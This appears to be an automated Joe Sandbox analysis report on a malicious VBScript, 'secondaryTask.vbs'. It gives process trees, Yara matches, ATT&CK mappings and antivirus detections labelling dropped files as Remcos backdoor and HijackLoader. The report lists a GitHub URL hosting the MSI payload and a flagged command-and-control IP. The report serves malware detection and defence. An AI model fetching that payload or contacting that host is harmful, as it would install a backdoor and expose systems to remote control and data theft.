                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Process created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                      Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00402404 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_2043D840 GetVersionExW
                      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 7.3.Updwork.exe.23c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.3.Updwork.exe.21f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.3.Updwork.exe.23c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.3.Updwork.exe.21f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.3.RaftelibeGasrss.exe.2930000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.WerFault.exe.24a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.3.RaftelibeGasrss.exe.2980000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.3.RaftelibeGasrss.exe.2980000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.3.RaftelibeGasrss.exe.2930000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.WerFault.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Updwork.exe PID: 6032, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: WerFault.exe PID: 6040, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RaftelibeGasrss.exe PID: 4416, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: WerFault.exe PID: 5504, type: MEMORYSTR
                      Source: Yara match | File source: 7.3.Updwork.exe.23c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.3.Updwork.exe.21f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.3.Updwork.exe.23c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.3.Updwork.exe.21f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.3.RaftelibeGasrss.exe.2930000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.WerFault.exe.24a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.3.RaftelibeGasrss.exe.2980000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.3.RaftelibeGasrss.exe.2980000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.3.RaftelibeGasrss.exe.2930000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.WerFault.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Updwork.exe PID: 6032, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: WerFault.exe PID: 6040, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RaftelibeGasrss.exe PID: 4416, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: WerFault.exe PID: 5504, type: MEMORYSTR
                      Source: Yara match | File source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED

                      Remote Access Functionality

Source: Yara match, File source: 7.3.Updwork.exe.23c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.3.Updwork.exe.21f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.3.Updwork.exe.23c0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.3.Updwork.exe.21f0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 22.3.RaftelibeGasrss.exe.2930000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.WerFault.exe.24a0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 22.3.RaftelibeGasrss.exe.2980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 22.3.RaftelibeGasrss.exe.2980000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 22.3.RaftelibeGasrss.exe.2930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 27.2.WerFault.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Updwork.exe PID: 6032, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: WerFault.exe PID: 6040, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RaftelibeGasrss.exe PID: 4416, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: WerFault.exe PID: 5504, type: MEMORYSTR
Source: Yara match, File source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED
MITRE ATT&CK Matrix, listed per tactic column (numbers in parentheses are the report's own match counts; techniques listed without a number are the matrix's unmatched placeholder entries)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses

Resource Development: Scripting (221); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure

Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise

Execution: Native API (2); Command and Scripting Interpreter (2); Service Execution (12); Software Deployment Tools (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell

Persistence: Scripting (221); DLL Side-Loading (11); Windows Service (14); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron

Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (11); Access Token Manipulation (1); Windows Service (14); Process Injection (411); Registry Run Keys / Startup Folder (1); Startup Items; Scheduled Task/Job; At; Cron

Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); DLL Side-Loading (11); File Deletion (1); Masquerading (31); Virtualization/Sandbox Evasion (12); Access Token Manipulation (1); Process Injection (411)

Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing

Discovery: System Time Discovery (1); Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (216); Query Registry (1); Security Software Discovery (411); Virtualization/Sandbox Evasion (12); Process Discovery (1); Application Window Discovery (1); Network Service Discovery

Lateral Movement: Software Deployment Tools (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot

Collection: Archive Collected Data (11); Input Capture (11); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging

Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1565487, Sample: secondaryTask.vbs, Startdate: 30/11/2024, Architecture: WINDOWS, Score: 100

The graph is rendered here as a process tree; the numbers after a process name are the per-process counts shown in the graph (see the legend above), and "started", "dropped" and the signature lines are the graph's edge labels.

Sample (root)
  Network: 185.157.162.126 (OBE-EUROPE Obenetwork Europe SE, Sweden); shed.dual-low.s-part-0035.t-0009.t-msedge.net; 6 other IPs or domains
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 10 other signatures
  Started: msiexec.exe (23, 48); RaftelibeGasrss.exe (11); EHttpSrv.exe (1); 3 other processes

  msiexec.exe (23, 48)
    Network: github.com (20.233.83.145, port 443, local port 49707, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); raw.githubusercontent.com (185.199.108.133, port 443, local port 49709, FASTLYUS, Netherlands)
    Dropped: C:\Windows\Installer\MSI3C7A.tmp (PE32); C:\Windows\Installer\MSI3C5A.tmp (PE32); C:\Windows\Installer\MSI3C2A.tmp (PE32); 6 other files (4 malicious)
    Started: Updwork.exe (18); EHttpSrv.exe (1); msiexec.exe

    Updwork.exe (18)
      Dropped: C:\Users\user\AppData\Local\...\zlib1.dll (PE32)
      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; 4 other signatures
      Started: WerFault.exe

    EHttpSrv.exe (1)
      Signatures: Found API chain indicative of debugger detection; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
      Started: cmd.exe (1)

      cmd.exe (1)
        Signatures: Found hidden mapped module (file has been removed from disk); Switches to a custom stack to bypass stack traces
        Started: conhost.exe

  RaftelibeGasrss.exe (11)
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Tries to detect virtualization through RDTSC time measurements; 3 other signatures
    Started: WerFault.exe

  EHttpSrv.exe (1)
    Signatures: Maps a DLL or memory area into another process
    Started: cmd.exe (2)

    cmd.exe (2)
      Dropped: C:\Users\user\AppData\Local\Temp\dsx (PE32)
      Started: EHttpSrv.exe; conhost.exe

      EHttpSrv.exe
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)

  3 other processes
    Signatures: VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage); Installs a MSI (Microsoft Installer) remotely
    Started: cmd.exe (4); cmd.exe (1); msiexec.exe

    cmd.exe (4)
      Dropped: C:\Users\user\AppData\Local\...\yljutqdulam (PE32)
      Started: EHttpSrv.exe; conhost.exe

    cmd.exe (1)
      Started: conhost.exe

Antivirus detection for the sample

Source | Detection | Scanner | Label
secondaryTask.vbs | 8% | ReversingLabs | Script-WScript.Backdoor.Remcos
secondaryTask.vbs | 6% | Virustotal |

Antivirus detection for dropped files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\http_dll.dll | 100% | Avira | TR/HijackLoader.cugkp
C:\Users\user\AppData\Local\Temp\dsx | 100% | Avira | BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\Updwork.exe | 100% | Avira | HEUR/AGEN.1338067
C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll | 100% | Avira | HEUR/AGEN.1363590
C:\Users\user\AppData\Local\Temp\yljutqdulam | 100% | Avira | BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\dsx | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\yljutqdulam | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll | 46% | ReversingLabs | Win32.Trojan.Nekark
C:\Users\user\AppData\Local\Temp\Updwork.exe | 37% | ReversingLabs | Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\dsx | 89% | ReversingLabs | Win32.Backdoor.Remcos
C:\Users\user\AppData\Local\Temp\http_dll.dll | 62% | ReversingLabs | Win32.Trojan.HijackLoader
C:\Users\user\AppData\Local\Temp\mfc80u.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\msvcr80.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\yljutqdulam | 89% | ReversingLabs | Win32.Backdoor.Remcos
C:\Windows\Installer\MSI3BAC.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI3C2A.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI3C5A.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI3C7A.tmp | 0% | ReversingLabs |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
github.com | 20.233.83.145 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
URLs contacted

Name | Malicious | Antivirus Detection | Reputation
https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi | false | | high
https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi | false | | high
URLs found in memory and dropped files

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi1630105376311466440 | ~DF5F00B5FE69ED3BD9.TMP.3.dr | false | | high
http://nsis.sf.net/NSIS_Error | Updwork.exe, Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, Updwork.exe, 00000007.00000000.2277511734.000000000040A000.00000008.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588293176.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Updwork.exe.3.dr | false | | high
http://www.vmware.com/0 | EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zlib.net/ | Updwork.exe, Updwork.exe, 00000007.00000000.2277568038.0000000000438000.00000002.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588325124.0000000000438000.00000002.00000001.01000000.0000000D.sdmp, Updwork.exe.3.dr | false | | high
ftp://http://HTTP/1.0 | EHttpSrv.exe, 00000006.00000002.2336798815.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000000F.00000002.2442489218.000000006C541000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 00000018.00000002.2781699116.000000006C951000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000001D.00000002.2886647949.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, mfc80u.dll.3.dr | false | | high
https://www.thawte.com/cps0/ | MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | false | | high
http://www.symauth.com/rpa00 | EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zlib.net/D | Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, zlib1.dll.7.dr | false | | high
https://github.com/Kroby5444/ | wscript.exe, 00000000.00000002.2180487920.000001BE6E1E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180154871.000001BE6E1E7000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.thawte.com/repository0W | MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | false | | high
http://www.info-zip.org/ | EHttpSrv.exe, 00000006.00000002.2334264703.0000000002363000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.0000000005223000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.000000000233D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.0000000002536000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.00000000022E9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.00000000023AF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BB2000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.0000000002488000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.vmware.com/0/ | EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.advancedinstaller.com | MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, Updwork.exe, 00000007.00000000.2277511734.000000000040A000.00000008.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588293176.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Updwork.exe.3.dr | false | | high
https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi0 | ~DF3A55DD39FD7B01DD.TMP.3.dr, inprogressinstallinfo.ipi.3.dr, ~DF3C7138185BD29209.TMP.3.dr, ~DFF5932D2E29931496.TMP.3.dr, ~DFEAD6EDEC35001CF3.TMP.3.dr, ~DFD62908AF9B4414CC.TMP.3.dr | false | | high
http://www.symauth.com/cps0( | EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.ms | wscript.exe, 00000000.00000002.2180621569.000001BE6E5A5000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
185.157.162.126 | unknown | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | true
20.233.83.145 | github.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565487
Start date and time: 2024-11-30 01:24:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: secondaryTask.vbs
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBS@34/38@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 52%
• Number of executed functions: 6
• Number of non-executed functions: 332
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
